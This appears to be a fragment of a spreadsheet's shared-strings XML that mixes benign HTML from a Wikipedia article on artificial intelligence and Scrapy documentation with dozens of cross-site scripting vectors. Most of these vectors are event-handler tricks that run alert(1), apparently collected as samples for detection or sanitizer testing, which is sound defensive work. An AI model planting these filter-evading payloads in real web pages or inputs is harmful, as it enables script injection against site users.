    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Chipless_RFID" title="Chipless RFID"&gt;Chipless RFID &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onkeyup="alert(1)" contenteditable&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;ins onbeforecopy="alert(1)" contenteditable&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;caption onbeforepaste="alert(1)" contenteditable&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onpointermove=alert(1)&gt;XSS&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;source onmouseenter="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onkeydown="alert(1)" contenteditable&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;font id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/font&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;blink onbeforecopy="alert(1)" contenteditable&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a class="mw-selflink selflink"&gt;Artificial intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1688) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;body draggable="true" ondragenter="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onbeforecopy="alert(1)" contenteditable&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-:1-290"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-:1_290-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-:1_290-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;noembed onkeydown="alert(1)" contenteditable&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-296"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-296"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Dynamic_Bayesian_network" title="Dynamic Bayesian network"&gt;Dynamic Bayesian networks &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;input type="text" name="q" placeholder="Search docs" /&gt;</t>
  </si>
  <si>
    <t>&lt;textarea autofocus onfocusin=alert(1)&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Control_theory" title="Control theory"&gt;Control method &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;embed onmouseout="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;s id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Reinforcement_learning" title="Reinforcement learning"&gt;Reinforcement learning &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;acronym id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;sup id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;audio src/onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;progress onpointerleave=alert(1)&gt;XSS&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;q ondblclick="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=5" title="Edit section: Reasoning, problem solving"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;strike oncontextmenu="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;input oncopy=alert(1) value="XSS" autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Cellular_evolutionary_algorithm" title="Cellular evolutionary algorithm"&gt;Cellular evolutionary algorithm &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nobr id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/nobr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;address oncontextmenu="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;legend onmouseup="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;summary onpointerover=alert(1)&gt;XSS&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;noframes id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/noframes&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Visualization_(graphics)" title="Visualization (graphics)"&gt;Visualization &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;h1 ondblclick="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;listing onpointermove=alert(1)&gt;XSS&lt;/listing&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">           &lt;a href="#" class="icon icon-home"&gt; Scrapy</t>
  </si>
  <si>
    <t>&lt;p&gt;When computers with large memories became available around 1970, researchers from all three traditions began to build &lt;a href="/wiki/Knowledge_representation" class="mw-redirect" title="Knowledge representation"&gt;knowledge &lt;/a&gt; into AI applications.&lt;sup id="cite_ref-Knowledge_revolution_165-0" class="reference"&gt;&lt;a href="#cite_note-Knowledge_revolution-165"&gt;&amp;#91;162&amp;#93; &lt;/a&gt; &lt;/sup&gt; This "knowledge revolution" led to the development and deployment of &lt;a href="/wiki/Expert_system" title="Expert system"&gt;expert systems &lt;/a&gt; (introduced by &lt;a href="/wiki/Edward_Feigenbaum" title="Edward Feigenbaum"&gt;Edward Feigenbaum &lt;/a&gt;), the first truly successful form of AI software.&lt;sup id="cite_ref-Expert_systems_41-1" class="reference"&gt;&lt;a href="#cite_note-Expert_systems-41"&gt;&amp;#91;41&amp;#93; &lt;/a&gt; &lt;/sup&gt; A key component of the system architecture for all expert systems is the knowledge base, which stores facts and rules that illustrate AI.&lt;sup id="cite_ref-166" class="reference"&gt;&lt;a href="#cite_note-166"&gt;&amp;#91;163&amp;#93; &lt;/a&gt; &lt;/sup&gt; The knowledge revolution was also driven by the realization that enormous amounts of knowledge would be required by many simple AI applications.</t>
  </si>
  <si>
    <t>&lt;multicol oncut="alert(1)" contenteditable&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;audio id=x controls onfocus=alert(1) id=x&gt;&lt;source src="validaudio.wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;map onmouseenter="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;ul onkeydown="alert(1)" contenteditable&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;footer style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;font onpointerleave=alert(1)&gt;XSS&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;data onpointerdown=alert(1)&gt;XSS&lt;/data&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFO&amp;#39;BrienMarakas2011"&gt;O'Brien &amp;amp; Marakas 2011 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;blink id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;video oncanplaythrough=alert(1)&gt;&lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;col oncontextmenu="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-303"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-303"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Solipsism" title="Solipsism"&gt;Solipsism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;option oncut="alert(1)" contenteditable&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(2009) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;sub onbeforepaste="alert(1)" contenteditable&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-ecthr2016-293"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-ecthr2016_293-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFGödel1951" class="citation conference"&gt;&lt;a href="/wiki/Kurt_G%C3%B6del" title="Kurt Gödel"&gt;Gödel, Kurt &lt;/a&gt; (1951). &lt;i&gt;Some basic theorems on the foundations of mathematics and their implications &lt;/i&gt;. Gibbs Lecture. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=conference&amp;amp;rft.btitle=Some+basic+theorems+on+the+foundations+of+mathematics+and+their+implications&amp;amp;rft.date=1951&amp;amp;rft.aulast=G%C3%B6del&amp;amp;rft.aufirst=Kurt&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;tbody id=x tabindex=1 onfocus=alert(1)&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;figure onpaste="alert(1)" contenteditable&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;link ondragover=alert(1) contenteditable&gt;drop here&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;tbody onload=alert(1)&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;acronym id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/acronym&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;content onclick="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onbeforepaste="alert(1)" contenteditable&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;menu id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;body ondblclick="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;h1 id=x tabindex=1 onfocus=alert(1)&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Cortana" title="Cortana"&gt;Cortana &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;s onkeydown="alert(1)" contenteditable&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;figure onpointerout=alert(1)&gt;XSS&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;video onmouseenter="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;center id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Embedded_system" title="Embedded system"&gt;Embedded system &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Potential harm </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation arxiv"&gt;Vinyals, Oriol; Toshev, Alexander; Bengio, Samy; Erhan, Dumitru (2015). "Show and Tell: A Neural Image Caption Generator". &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1411.4555"&gt;1411.4555 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;nobr onload=alert(1)&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;a onkeydown="alert(1)" contenteditable&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/div&gt;&lt;/div&gt;     </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;div onload=alert(1)&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;dfn draggable="true" ondragstart="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onmouseenter="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;script onreadystatechange=alert(1)&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;a onpointerleave=alert(1)&gt;XSS&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;label onclick="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Green_computing" title="Green computing"&gt;Energy consumption (Green computing) &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Object_recognition" class="mw-redirect" title="Object recognition"&gt;Object recognition &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;animatetransform onpointerleave=alert(1)&gt;XSS&lt;/animatetransform&gt;</t>
  </si>
  <si>
    <t>&lt;dl onmouseenter="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;form oncopy="alert(1)" contenteditable&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;li draggable="true" ondragleave="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;template draggable="true" ondrag="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;strong onmouseout="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;summary id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Identity_(philosophy)" title="Identity (philosophy)"&gt;Identity &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onclick="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;sub onbeforecut="alert(1)" contenteditable&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;79–121 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Slyusar, Vadym (2019). &lt;a rel="nofollow" class="external text" href="https://www.researchgate.net/publication/334573170"&gt;"Artificial intelligence as the basis of future control networks" &lt;/a&gt;. &lt;i&gt;Preprint &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Preprint&amp;amp;rft.atitle=Artificial+intelligence+as+the+basis+of+future+control+networks.&amp;amp;rft.date=2019&amp;amp;rft.aulast=Slyusar&amp;amp;rft.aufirst=Vadym&amp;amp;rft_id=https%3A%2F%2Fwww.researchgate.net%2Fpublication%2F334573170&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;element id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Sub-symbolic </t>
  </si>
  <si>
    <t>&lt;noscript onpointerleave=alert(1)&gt;XSS&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;fieldset id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Deductive-nomological_model" title="Deductive-nomological model"&gt;Deductive-nomological model &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;454–462 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onpointerdown=alert(1)&gt;XSS&lt;/datalist&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1147%2Frd.33.0210"&gt;10.1147/rd.33.0210 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=IBM+Journal+of+Research+and+Development&amp;amp;rft.atitle=Some+Studies+in+Machine+Learning+Using+the+Game+of+Checkers&amp;amp;rft.volume=3&amp;amp;rft.issue=3&amp;amp;rft.pages=210-229&amp;amp;rft.date=1959-07&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.368.2254&amp;amp;rft_id=info%3Adoi%2F10.1147%2Frd.33.0210&amp;amp;rft.aulast=Samuel&amp;amp;rft.aufirst=A.+L.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;blockquote ondrop=alert(1) contenteditable&gt;drop here&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;div class="div-col columns column-width" style="-moz-column-width: 20em; -webkit-column-width: 20em; column-width: 20em;"&gt;</t>
  </si>
  <si>
    <t>&lt;main draggable="true" ondragstart="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;mark onpointermove=alert(1)&gt;XSS&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;object oncut="alert(1)" contenteditable&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;samp onpointerover=alert(1)&gt;XSS&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;datalist style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mathematical_optimization" title="Mathematical optimization"&gt;Mathematical optimization &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Evolutionary_robotics" title="Evolutionary robotics"&gt;Evolutionary robotics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;label onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/label&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=62" title="Edit section: Computationalism and functionalism"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;964 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;spacer id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onmouseover="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;rt onbeforecut="alert(1)" contenteditable&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;sup draggable="true" ondragenter="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;79–164, 193–219 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;wbr id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;pp. 132–147, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;u id=x tabindex=1 onfocus=alert(1)&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;dir oncut="alert(1)" contenteditable&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onkeypress="alert(1)" contenteditable&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/nobr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;article onmousemove="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;marquee ondblclick="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/small&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/Our_Final_Invention" title="Our Final Invention"&gt;Our Final Invention &lt;/a&gt; &lt;/i&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;template onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/template&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/World_Brain" title="World Brain"&gt;World Brain &lt;/a&gt; &lt;/i&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Classifiers and statistical learning methods </t>
  </si>
  <si>
    <t>&lt;svg onkeydown="alert(1)" contenteditable&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ingenuity" title="Ingenuity"&gt;Ingenuity &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;145–62, 197–203 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;form onmouseup="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFPenrose1989" class="citation book"&gt;&lt;a href="/wiki/Roger_Penrose" title="Roger Penrose"&gt;Penrose, Roger &lt;/a&gt; (1989). &lt;i&gt;The Emperor's New Mind: Concerning Computer, Minds and The Laws of Physics &lt;/i&gt;. &lt;a href="/wiki/Oxford_University_Press" title="Oxford University Press"&gt;Oxford University Press &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-19-851973-7" title="Special:BookSources/978-0-19-851973-7"&gt;&lt;bdi&gt;978-0-19-851973-7 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Emperor%27s+New+Mind%3A+Concerning+Computer%2C+Minds+and+The+Laws+of+Physics&amp;amp;rft.pub=Oxford+University+Press&amp;amp;rft.date=1989&amp;amp;rft.isbn=978-0-19-851973-7&amp;amp;rft.aulast=Penrose&amp;amp;rft.aufirst=Roger&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style onpointerenter=alert(1)&gt;XSS&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1983"&gt;Nilsson 1983 &lt;/a&gt;, pp.&amp;#160;10–11 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Learn how to debug common problems of your Scrapy spider.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;input onbeforecut=alert(1) value="XSS" autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;head&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-36"&gt;&lt;a href="#Healthcare"&gt;&lt;span class="tocnumber"&gt;7.1 </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;spacer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;mark draggable="true" ondragstart="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;title id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=WIRED&amp;amp;rft.atitle=Facebook+Quietly+Enters+StarCraft+War+for+AI+Bots%2C+and+Loses&amp;amp;rft.date=2017&amp;amp;rft_id=https%3A%2F%2Fwww.wired.com%2Fstory%2Ffacebook-quietly-enters-starcraft-war-for-ai-bots-and-loses%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Evolutionary_algorithm" title="Evolutionary algorithm"&gt;Evolutionary algorithms &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;svg onbeforepaste="alert(1)" contenteditable&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_computer_hardware_terms" title="Glossary of computer hardware terms"&gt;Computer hardware &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;title onkeydown="alert(1)" contenteditable&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onpointerdown=alert(1)&gt;XSS&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;head id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/head&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/blockquote&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;nextid ondblclick="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;rp draggable="true" ondragenter="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onbeforecopy="alert(1)" contenteditable&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Symbolic_learning_techniques-196"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Symbolic_learning_techniques_196-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
